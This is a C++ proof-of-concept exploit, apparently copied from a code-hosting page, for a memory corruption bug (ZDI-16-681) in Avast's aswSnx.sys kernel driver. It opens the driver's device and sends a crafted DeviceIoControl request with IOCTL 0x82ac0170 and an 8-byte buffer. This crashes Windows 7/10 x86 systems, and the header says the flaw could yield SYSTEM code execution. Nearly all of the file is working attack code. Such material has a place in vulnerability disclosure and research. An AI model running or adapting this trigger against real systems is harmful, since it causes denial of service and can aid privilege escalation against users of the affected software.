45 lines
No EOL
970 B
C++
45 lines
No EOL
970 B
C++
/**
|
|
* Author: bee13oy
|
|
* BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)
|
|
* Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)
|
|
*
|
|
* There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl
|
|
* number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the
|
|
* context of SYSTEM.
|
|
**/
|
|
|
|
#include <Windows.h>
|
|
|
|
void BSoD(const char* szDeviceName)
|
|
{
|
|
HANDLE hDevice = CreateFileA(szDeviceName,
|
|
GENERIC_READ,
|
|
0,
|
|
NULL,
|
|
OPEN_EXISTING,
|
|
0,
|
|
NULL);
|
|
|
|
if (hDevice != INVALID_HANDLE_VALUE)
|
|
{
|
|
DWORD nbBytes = 0;
|
|
CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a";
|
|
CHAR bufOuput[0x8+1] = "";
|
|
DeviceIoControl(hDevice,
|
|
0x82ac0170,
|
|
bufInput,
|
|
0x00000008,
|
|
bufOuput,
|
|
0x00000008,
|
|
&nbBytes,
|
|
NULL
|
|
);
|
|
}
|
|
}
|
|
|
|
int _tmain(int argc, _TCHAR* argv[])
|
|
{
|
|
BSoD("\\\\.\\aswSnx");
|
|
|
|
return 0;
|
|
} |